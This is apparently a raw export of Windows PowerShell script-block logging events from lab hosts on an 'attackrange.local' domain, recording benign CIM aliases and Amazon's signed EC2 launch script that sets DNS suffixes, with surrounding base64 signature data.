AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDVtC9C # 0CiteLdd1TlZG7GIQvUzjOs9gZdwxbvEhSYwn6SOaNhc9es0JAfhS0/TeEP0F9ce # 2vnS1WcaUk8OoVf8iJnBkcyBAz5NcCRks43iCH00fUyAVxJrQ5qZ8sU7H/Lvy0da # E6ZMswEgJfMQ04uy+wjwiuCdCcBlp/qYgEk1hz1RGeiQIXhFLqGfLOEYwhrMxe6T # SXBCMo/7xuoc82VokaJNTIIRSFJo3hC9FFdd6BgTZcV/sk+FLEikVoQ11vkunKoA # FdE3/hoGlMJ8yOobMubKwvSnowMOdKWvObarYBLj6Na59zHh3K3kGKDYwSNHR7Oh # D26jq22YBoMbt2pnLdK9RBqSEIGPsDsJ18ebMlrC/2pgVItJwZPt4bRc4G/rJvmM # 1bL5OBDm6s6R9b7T+2+TYTRcvJNFKIM2KmYoX7BzzosmJQayg9Rc9hUZTO1i4F4z # 8ujo7AqnsAMrkbI2eb73rQgedaZlzLvjSFDzd5Ea/ttQokbIYViY9XwCFjyDKK05 # huzUtw1T0PhH5nUwjewwk3YUpltLXXRhTT8SkXbev1jLchApQfDVxW0mdmgRQRNY # mtwmKwH0iU1Z23jPgUo+QEdfyYFQc4UQIyFZYIpkVMHMIRroOBl8ZhzNeDhFMJlP # /2NPTLuqDQhTQXxYPUez+rbsjDIJAsxsPAxWEQIDAQABo4IBWTCCAVUwEgYDVR0T # AQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUaDfg67Y7+F8Rhvv+YXsIiGX0TkIwHwYD # VR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYY # aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2Fj # ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV # HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkUm9vdEc0LmNybDAcBgNVHSAEFTATMAcGBWeBDAEDMAgGBmeBDAEEATAN # BgkqhkiG9w0BAQwFAAOCAgEAOiNEPY0Idu6PvDqZ01bgAhql+Eg08yy25nRm95Ry # sQDKr2wwJxMSnpBEn0v9nqN8JtU3vDpdSG2V1T9J9Ce7FoFFUP2cvbaF4HZ+N3HL # IvdaqpDP9ZNq4+sg0dVQeYiaiorBtr2hSBh+3NiAGhEZGM1hmYFW9snjdufE5Btf # Q/g+lP92OT2e1JnPSt0o618moZVYSNUa/tcnP/2Q0XaG3RywYFzzDaju4ImhvTnh # OE7abrs2nfvlIVNaw8rpavGiPttDuDPITzgUkpn13c5UbdldAhQfQDN8A+KVssIh # dXNSy0bYxDQcoqVLjc1vdjcshT8azibpGL6QB7BDf5WIIIJw8MzK7/0pNVwfiThV # 9zeKiwmhywvpMRr/LhlcOXHhvpynCgbWJme3kuZOX956rEnPLqR0kq3bPKSchh/j # wVYbKyP/j7XqiHtwa+aguv06P0WmxOgWkVKLQcBIhEuWTatEQOON8BUozu3xGFYH # Ki8QxAwIZDwzj64ojDzLj4gLDb879M4ee47vtevLt/B3E+bnKD+sEq6lLyJsQfmC # XBVmzGwOysWGw/YmMwwHS6DTBwJqakAwSEs0qFEgu60bhQjiWQ1tygVQK+pKHJ6l # /aCnHwZ05/LWUpD9r4VIIflXO7ScA+2GRfS0YW6/aOImYIbqyK+p/pQd52MbOoZW # eE4wggedMIIFhaADAgECAhACxyVvD/v+ctpMbqqoNdVVMA0GCSqGSIb3DQEBCwUA # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTEwHhcNMjIxMTA1MDAwMDAwWhcNMjMxMTA4MjM1OTU5WjCB8jET # MBEGCysGAQQBgjc8AgEDEwJVUzEZMBcGCysGAQQBgjc8AgECEwhEZWxhd2FyZTEd # MBsGA1UEDwwUUHJpdmF0ZSBPcmdhbml6YXRpb24xEDAOBgNVBAUTBzQxNTI5NTQx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0 # dGxlMSIwIAYDVQQKExlBbWF6b24gV2ViIFNlcnZpY2VzLCBJbmMuMRMwEQYDVQQL # EwpBbWF6b24gRUMyMSIwIAYDVQQDExlBbWF6b24gV2ViIFNlcnZpY2VzLCBJbmMu # MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA0jWbhD4ghdeO4Nndy/2h # vCCUPPKnL63myeBZYItXG1dnB5gpJIrBVu40V4OaiNwyUAiBrO5eGM4IaWLqbxvj # 324KRuXtmHcXvF7YRgiciflrsfzoUEu4TdKj+owTNA2uektzbVLWzT0wFKe5n4Xe # CAqQQe33ODVB+cBTUSv/TRWf3Edni17S8HldwSq+YvPIRv21Shp7fiCxO45ETxwl # BsoeNrwLAQz0QpiaGdY5Fb+12jcoWRqYqAiXGeDLA7Wxq1+Xj2n+UwelzhYfcE5/ # p8w4FsFJi9tVb0aWS63OnP+aTOCrA5bz5j9wq8x25/hCGm6HktmbZRwjKiFQ+HdL # g0t3250T9hxvXjudh/DGPCIcmQzKBuxijP8f60DutqLk/EsS+Z5xD/s9/rruXfAj # czkZ/xpHLHKa+Fp7x+tIwuC5Zq6VAM6CFgJOWefYG5h8sjZFhrphbnYzs0C75SCx # KOKFe6RyrQ+O+xh96ky4kw47zNXbbc7xBqVjLjbOgSTFAgMBAAGjggI1MIICMTAf # BgNVHSMEGDAWgBRoN+Drtjv4XxGG+/5hewiIZfROQjAdBgNVHQ4EFgQUOv3VJlso # 3pHAv43pOWMQfdVdjXkwLgYDVR0RBCcwJaAjBggrBgEFBQcIA6AXMBUME1VTLURF # TEFXQVJFLTQxNTI5NTQwDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUF # BwMDMIG1BgNVHR8Ega0wgaowU6BRoE+GTWh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNv # bS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNBNDA5NlNIQTM4NDIwMjFD # QTEuY3JsMFOgUaBPhk1odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRU # cnVzdGVkRzRDb2RlU2lnbmluZ1JTQTQwOTZTSEEzODQyMDIxQ0ExLmNybDA9BgNV # HSAENjA0MDIGBWeBDAEDMCkwJwYIKwYBBQUHAgEWG2h0dHA6Ly93d3cuZGlnaWNl # cnQuY29tL0NQUzCBlAYIKwYBBQUHAQEEgYcwgYQwJAYIKwYBBQUHMAGGGGh0dHA6 # Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBcBggrBgEFBQcwAoZQaHR0cDovL2NhY2VydHMu # ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25pbmdSU0E0MDk2 # U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOC # AgEARxdSHXYd6BO2G0SQESFEKuC2xGsuekZq4Q//Jg3mHKBkDSLrK1PEriBExb5n # JNAmCoh374kLOj9fbV5kPmj2kTdH65b1GVIp4VADVOwla1NGrbqFIvSzUN68xqWw # ITM15yR5OU4peuSD8pdxGLwIM3YEsorhVugVI/TZ3oSs89vMNKIUK4qrHvDpveUf # 1tQKFYUwyKEkauDqovs2pS7G6+1mqSgXx4Nt1OdZwwdXS8d14xcsaz96C+4G7fAr # lbcKiGnHwxlO0FaC+piuverA1NU3lw8UFlTdaQxldKhS47iKZaWTS+mwi2H5PC2G # cgXNlQG5tuh/TimhfHpqrvtrXBpNQTU6ydv6E/Bj6DE5VkJGIKua0GvI7LkwFBFC # WD1hrAEjtY2LkPAgMDQe9iqPoEGeNwZeEjJjLgayPLP7NsJRdA6uhXboMEFW2LNf # VM/hdzl1RG/5kJ4La/mEkpvQRtZRbaSPuSHRxGz//P62qKFQGL0K/YI9RlowyGrQ # ENfvztdmqPN8xLJ7C7IuWkx2ygO++4Vva/DaiXX2gMtt6hYYfngOt6+beRWLbpdr # cNgUrUJAGg8saVOkrBdziuB0fS93jso0mBvz0DTFXE5vvE8yOYQWR0njIOKbZuB5 # A15FSIngJ+joE7MFjkxwkQwx5czjrG0GVfqSSK8WiL5yq2wxghnnMIIZ4wIBATB9 # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # AxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcgUlNBNDA5NiBTSEEz # ODQgMjAyMSBDQTECEALHJW8P+/5y2kxuqqg11VUwDQYJYIZIAWUDBAIBBQCgfDAQ # BgorBgEEAYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgor # BgEEAYI3AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgW5Ej8brX # 5YlTBkoyY2drpoCT/V57IcT8S8Iq8hJJVtswDQYJKoZIhvcNAQEBBQAEggGAt5Ty # 7obsD/Z0ezG66VhUH0wII01W42R03uEEvqZg2YFV6D+kt5pnjZ4xSz+Vu0EP3eth # tUZcpF/uZOeLC1OVhCW+/VaqTjLZChaMBxzvEIB+RoUcOnxUJL5d3Qd9TAbLpm6i # nrm2KC4cgnNkRUsal37xBaTXPqoayv2ZGpkUtay8UkZzYinn3pKyjdWudevHInbO # hRY0LFWi9O3PRE3/iyTCCFP63zkcZrIKCC3Qy4U0oFbXQOZ3DsnJtMuC/1j0tUb5 # veZmgGjgG1/UGR/55o/cI+NiFMpkodqgyV/td4qrOkLg4SVk8ULKkDNxlhLIjOxg # WWYEyrEBr1L5BHO6MxmD9DLl2ysotevtX8WVt5wsgfY2pbGYx8nqFKBVPBhW26p/ # 33axLhgR8rNhhRRkU/W3uT1bW3x0sfssTaF6R3riQhrex27IJFPTLwOeJEQ5UhhE # IMdmXSQYEPHEQ4RqUTISJsMJ8KZrwktxpETj0cH3mSkmhFIiMpVwaQ633m5qoYIX # PTCCFzkGCisGAQQBgjcDAwExghcpMIIXJQYJKoZIhvcNAQcCoIIXFjCCFxICAQMx # DzANBglghkgBZQMEAgEFADB3BgsqhkiG9w0BCRABBKBoBGYwZAIBAQYJYIZIAYb9 # bAcBMDEwDQYJYIZIAWUDBAIBBQAEIHZBTdEg6m7H1JWYSgkwZqZJca9sn4GAr8Tv # //NRYrMmAhBBWvl/ekQTLH0fNK1QEpn/GA8yMDIyMTIyNDA5MjMyNlqgghMHMIIG # wDCCBKigAwIBAgIQDE1pckuU+jwqSj0pB4A9WjANBgkqhkiG9w0BAQsFADBjMQsw # CQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5BgNVBAMTMkRp # Z2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0YW1waW5nIENB # MB4XDTIyMDkyMTAwMDAwMFoXDTMzMTEyMTIzNTk1OVowRjELMAkGA1UEBhMCVVMx # ETAPBgNVBAoTCERpZ2lDZXJ0MSQwIgYDVQQDExtEaWdpQ2VydCBUaW1lc3RhbXAg # MjAyMiAtIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDP7KUmOsap # 8mu7jcENmtuh6BSFdDMaJqzQHFUeHjZtvJJVDGH0nQl3PRWWCC9rZKT9BoMW15GS # OBwxApb7crGXOlWvM+xhiummKNuQY1y9iVPgOi2Mh0KuJqTku3h4uXoW4VbGwLpk # U7sqFudQSLuIaQyIxvG+4C99O7HKU41Agx7ny3JJKB5MgB6FVueF7fJhvKo6B332 # q27lZt3iXPUv7Y3UTZWEaOOAy2p50dIQkUYp6z4m8rSMzUy5Zsi7qlA4DeWMlF0Z # Wr/1e0BubxaompyVR4aFeT4MXmaMGgokvpyq0py2909ueMQoP6McD1AGN7oI2TWm # tR7aeFgdOej4TJEQln5N4d3CraV++C0bH+wrRhijGfY59/XBT3EuiQMRoku7mL/6 # T+R7Nu8GRORV/zbq5Xwx5/PCUsTmFntafqUlc9vAapkhLWPlWfVNL5AfJ7fSqxTl # OGaHUQhr+1NDOdBk+lbP4PQK5hRtZHi7mP2Uw3Mh8y/CLiDXgazT8QfU4b3ZXUtu # MZQpi+ZBpGWUwFjl5S4pkKa3YWT62SBsGFFguqaBDwklU/G/O+mrBw5qBzliGcnW # hX8T2Y15z2LF7OF7ucxnEweawXjtxojIsG4yeccLWYONxu71LHx7jstkifGxxLjn # U15fVdJ9GSlZA076XepFcxyEftfO4tQ6dwIDAQABo4IBizCCAYcwDgYDVR0PAQH/ # BAQDAgeAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwIAYD # VR0gBBkwFzAIBgZngQwBBAIwCwYJYIZIAYb9bAcBMB8GA1UdIwQYMBaAFLoW2W1N # hS9zKXaaL3WMaiCPnshvMB0GA1UdDgQWBBRiit7QYfyPMRTtlwvNPSqUFN9SnDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNl # cnRUcnVzdGVkRzRSU0E0MDk2U0hBMjU2VGltZVN0YW1waW5nQ0EuY3JsMIGQBggr # BgEFBQcBAQSBgzCBgDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQu # Y29tMFgGCCsGAQUFBzAChkxodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGln # aUNlcnRUcnVzdGVkRzRSU0E0MDk2U0hBMjU2VGltZVN0YW1waW5nQ0EuY3J0MA0G # CSqGSIb3DQEBCwUAA4ICAQBVqioa80bzeFc3MPx140/WhSPx/PmVOZsl5vdyipjD # d9Rk/BX7NsJJUSx4iGNVCUY5APxp1MqbKfujP8DJAJsTHbCYidx48s18hc1Tna9i # 4mFmoxQqRYdKmEIrUPwbtZ4IMAn65C3XCYl5+QnmiM59G7hqopvBU2AJ6KO4ndet # Hxy47JhB8PYOgPvk/9+dEKfrALpfSo8aOlK06r8JSRU1NlmaD1TSsht/fl4JrXZU # inRtytIFZyt26/+YsiaVOBmIRBTlClmia+ciPkQh0j8cwJvtfEiy2JIMkU88ZpSv # XQJT657inuTTH4YBZJwAwuladHUNPeF5iL8cAZfJGSOA1zZaX5YWsWMMxkZAO85d # NdRZPkOaGK7DycvD+5sTX2q1x+DzBcNZ3ydiK95ByVO5/zQQZ/YmMph7/lxClIGU # gp2sCovGSxVK05iQRWAzgOAj3vgDpPZFR+XOuANCR+hBNnF3rf2i6Jd0Ti7aHh2M # WsgemtXC8MYiqE+bvdgcmlHEL5r2X6cnl7qWLoVXwGDneFZ/au/ClZpLEQLIgpzJ # GgV8unG1TnqZbPTontRamMifv427GFxD9dAq6OJi7ngE273R+1sKqHB+8JeEeOMI # A11HLGOoJTiXAdI/Otrl5fbmm9x+LMz/F0xNAKLY1gEOuIvu5uByVYksJxlh9ncB # jDCCBq4wggSWoAMCAQICEAc2N7ckVHzYR6z9KGYqXlswDQYJKoZIhvcNAQELBQAw # YjELMAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQ # d3d3LmRpZ2ljZXJ0LmNvbTEhMB8GA1UEAxMYRGlnaUNlcnQgVHJ1c3RlZCBSb290 # IEc0MB4XDTIyMDMyMzAwMDAwMFoXDTM3MDMyMjIzNTk1OVowYzELMAkGA1UEBhMC # VVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMTswOQYDVQQDEzJEaWdpQ2VydCBU # cnVzdGVkIEc0IFJTQTQwOTYgU0hBMjU2IFRpbWVTdGFtcGluZyBDQTCCAiIwDQYJ # KoZIhvcNAQEBBQADggIPADCCAgoCggIBAMaGNQZJs8E9cklRVcclA8TykTepl1Gh # 1tKD0Z5Mom2gsMyD+Vr2EaFEFUJfpIjzaPp985yJC3+dH54PMx9QEwsmc5Zt+Feo # An39Q7SE2hHxc7Gz7iuAhIoiGN/r2j3EF3+rGSs+QtxnjupRPfDWVtTnKC3r07G1 # decfBmWNlCnT2exp39mQh0YAe9tEQYncfGpXevA3eZ9drMvohGS0UvJ2R/dhgxnd # X7RUCyFobjchu0CsX7LeSn3O9TkSZ+8OpWNs5KbFHc02DVzV5huowWR0QKfAcsW6 # Th+xtVhNef7Xj3OTrCw54qVI1vCwMROpVymWJy71h6aPTnYVVSZwmCZ/oBpHIEPj # Q2OAe3VuJyWQmDo4EbP29p7mO1vsgd4iFNmCKseSv6De4z6ic/rnH1pslPJSlREr # WHRAKKtzQ87fSqEcazjFKfPKqpZzQmiftkaznTqj1QPgv/CiPMpC3BhIfxQ0z9JM # q++bPf4OuGQq+nUoJEHtQr8FnGZJUlD0UfM2SU2LINIsVzV5K6jzRWC8I41Y99xh # 3pP+OcD5sjClTNfpmEpYPtMDiP6zj9NeS3YSUZPJjAw7W4oiqMEmCPkUEBIDfV8j # u2TjY+Cm4T72wnSyPx4JduyrXUZ14mCjWAkBKAAOhFTuzuldyF4wEr1GnrXTdrnS # DmuZDNIztM2xAgMBAAGjggFdMIIBWTASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1Ud # DgQWBBS6FtltTYUvcyl2mi91jGogj57IbzAfBgNVHSMEGDAWgBTs1+OC0nFdZEzf # Lmc/57qYrhwPTzAOBgNVHQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUHAwgw # dwYIKwYBBQUHAQEEazBpMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2Vy # dC5jb20wQQYIKwYBBQUHMAKGNWh0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9E # aWdpQ2VydFRydXN0ZWRSb290RzQuY3J0MEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6 # Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydFRydXN0ZWRSb290RzQuY3JsMCAG # A1UdIAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwHATANBgkqhkiG9w0BAQsFAAOC # AgEAfVmOwJO2b5ipRCIBfmbW2CFC4bAYLhBNE88wU86/GPvHUF3iSyn7cIoNqilp # /GnBzx0H6T5gyNgL5Vxb122H+oQgJTQxZ822EpZvxFBMYh0MCIKoFr2pVs8Vc40B # IiXOlWk/R3f7cnQU1/+rT4osequFzUNf7WC2qk+RZp4snuCKrOX9jLxkJodskr2d # fNBwCnzvqLx1T7pa96kQsl3p/yhUifDVinF2ZdrM8HKjI/rAJ4JErpknG6skHibB # t94q6/aesXmZgaNWhqsKRcnfxI2g55j7+6adcq/Ex8HBanHZxhOACcS2n82HhyS7 # T6NJuXdmkfFynOlLAlKnN36TU6w7HQhJD5TNOXrd/yVjmScsPT9rp/Fmw0HNT7ZA # myEhQNC3EyTN3B14OuSereU0cZLXJmvkOHOrpgFPvT87eK1MrfvElXvtCl8zOYdB # eHo46Zzh3SP9HSjTx/no8Zhf+yvYfvJGnXUsHicsJttvFXseGYs2uJPU5vIXmVnK # cPA3v5gA3yAWTyf7YGcWoWa63VXAOimGsJigK+2VQbc61RWYMbRiCQ8KvYHZE/6/ # pNHzV9m8BPqC3jLfBInwAM1dwvnQI38AC+R2AibZ8GV2QqYphwlHK+Z/GqSFD/yY # lvZVVCsfgPrA8g4r5db7qS9EFUrnEw4d2zc4GqEr9u3WfPwwggWNMIIEdaADAgEC # AhAOmxiO+dAt5+/bUOIIQBhaMA0GCSqGSIb3DQEBDAUAMGUxCzAJBgNVBAYTAlVT # MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j # b20xJDAiBgNVBAMTG0RpZ2lDZXJ0IEFzc3VyZWQgSUQgUm9vdCBDQTAeFw0yMjA4 # MDEwMDAwMDBaFw0zMTExMDkyMzU5NTlaMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNV # BAa6967c97-e53c-431d-a156-a7af53a4a0a4C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Add-DnsSuffixList.ps1 4104152150x0228594Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue3a298af1-d8fe-46a4-b91b-e08faccdc449 4104152150x0228588Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue771fbe16-eedd-4eea-a856-673925ce657b 4104152150x0228582Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinuec702a481-a709-48f0-b8f5-337f1095706e 4104152150x0228493Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue8041dacf-c134-4ca9-b70d-90806e3edf44 4104152150x0228487Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinuee1621ee1-ae19-4c44-9dd0-387ec317f9ae 4104152150x0228481Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue3ce17f19-9aa1-4d81-86cd-957c512e41f4 4104152150x0226869Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinuec637e5fe-d12e-48eb-8c9d-a5beee7911c2 4104152150x0226863Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinuee62ea3c2-bd61-4230-a1a3-2cfb4064700c 4104152150x0226857Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinueb7612e1d-d191-4ba0-98d6-d1a41bec6f02 4104152150x0699692Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue05596dc6-4374-4072-8acd-73206f6335e5 4104152150x0699686Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinuec36e90bf-c906-457a-afce-2ee4eabf1fe5 4104152150x0699680Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue0874747a-cbfd-4d35-840f-b10c01aad1e8 4104152150x0698873Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinueea66ccf9-b020-4783-9664-fe343e4d0b03 4104152150x0698867Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinueff74ea1b-20cd-4238-8fe5-41fee99a7f4e 4104152150x0698861Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinueaac4cf34-fe2c-4860-81ba-6b9419b3d24f 4104152150x0698586Microsoft-Windows-PowerShell/Operationalmswin-dc01.attackrange.local12# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Amazon Software License (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/asl/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. <#----------------------------------------------------------------------------------------------------------- Add-DnsSuffixList adds DNS suffixes. -------------------------------------------------------------------------------------------------------------#> function Add-DnsSuffixList { $state = Get-LaunchConfig -Key AddDnsSuffixList [System.GC]::Collect() if (-not $state) { Write-Log "Adding DNS suffix list is disabled" return } $suffixList = @() Write-Log ("Adding DNS suffixes in search list begins") # Try to create a suffix with available zone try { # Availability-zone includes period at the end, so it needs to remove it. $availabilityZone = (Get-Metadata -UrlFragment "meta-data/placement/availability-zone").Trim() if ($availabilityZone.EndsWith(".")) { $availabilityZone = $availabilityZone.Substring(0,$availabilityZone.Length - 1) } $suffixList += "{0}.ec2-utilities.amazonaws.com" -f $availabilityZone.Substring(0,$availabilityZone.Length - 1) } catch { Write-ErrorLog ("Failed to get availability zone: {0}" -f $_.Exception.Message) } # Try to get global search list try { $tcpRegPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" $tcpRegRes = Get-ItemProperty -Path $tcpRegPath $existingList = $tcpRegRes.SearchList -split "," foreach ($existing in $existingList) { if ($existing -and $suffixList -notcontains $existing) { $suffixList += $existing.ToLower() } } } catch { Write-ErrorLog ("Failed to get global search list: {0}" -f $_.Exception.Message) } # Try to get DNS Domain try { $dnsDomain = $tcpRegRes.Domain if ($dnsDomain -and $suffixList -notcontains $dnsDomain) { $suffixList += $dnsDomain.ToLower() } $isUsingDomainDevolution = $tcpRegRes.UseDomainNameDevolution if ($isUsingDomainDevolution -ne 0) { $dnsDomains = $dnsDomain -split "\." if ($dnsDomains.Length -gt 2) { $dns = $dnsDomains.Get($dnsDomains.Length - 1) for ($i = $dnsDomains.Length - 2; $i -ge 1; $i --) { $dns = "{0}.{1}" -f $dnsDomains.Get($i),$dns if ($dns -and $suffixList -notcontains $dns) { $suffixList += $dns.ToLower() } } } } } catch { Write-ErrorLog ("Failed to get DNS domain from registry: {0}" -f $_.Exception.Message) } # Try to get NV Domain - contains computer's primary DNS suffix try { $nvDomain = $tcpRegRes. "NV Domain" if ($nvDomain -and $suffixList -notcontains $nvDomain) { $suffixList += $nvDomain.ToLower() } } catch { Write-ErrorLog ("Failed to get NV domain: {0}" -f $_.Exception.Message) } # Try to get DNS Domain from connected NICs try { $networkAdapters = Get-CimInstance -ClassName Win32_NetworkAdapter foreach ($networkAdapter in $networkAdapters) { # Check each NIC if it is connected (Connected = 2) if ($networkAdapter.NetConnectionStatus -eq 2) { $networkConfig = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "Index='$($networkAdapter.Index)'" $nicDnsDomain = $networkConfig.DNSDomain if ($nicDnsDomain -and $suffixList -notcontains $nicDnsDomain) { $suffixList += $nicDnsDomain.ToLower() } } } } catch { Write-ErrorLog ("Failed to get DNS domain from NICs: {0}" -f $_.Exception.Message) } try { # Set DNS suffix search list Invoke-CimMethod -ClassName Win32_NetworkAdapterConfiguration -MethodName "SetDNSSuffixSearchOrder" -Arguments @{ DNSDomainSuffixSearchOrder = $suffixList } | Out-Null } catch { Write-ErrorLog ("Failed to set DNS suffix search list: {0}" -f $_.Exception.Message) } Write-Log ("Adding DNS suffixes in search list done") } # SIG # Begin signature block # MIIuqgYJKoZIhvcNAQcCoIIumzCCLpcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAwdXMjmgee8GrG # wK7q1ggMNwj1l3PZixsOVf6I/u33B6CCFBkwggXAMIIEqKADAgECAhAP0bvKeWvX # +N1MguEKmpYxMA0GCSqGSIb3DQEBCwUAMGwxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xKzApBgNV # BAMTIkRpZ2lDZXJ0IEhpZ2ggQXNzdXJhbmNlIEVWIFJvb3QgQ0EwHhcNMjIwMTEz # MDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQswCQYDVQQGEwJVUzEVMBMGA1UEChMM # RGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQD # ExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqGSIb3DQEBAQUAA4IC # DwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3yithZwuEppz1Yq3aa # za57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1Ifxp4VpX6+n6lXFllV # 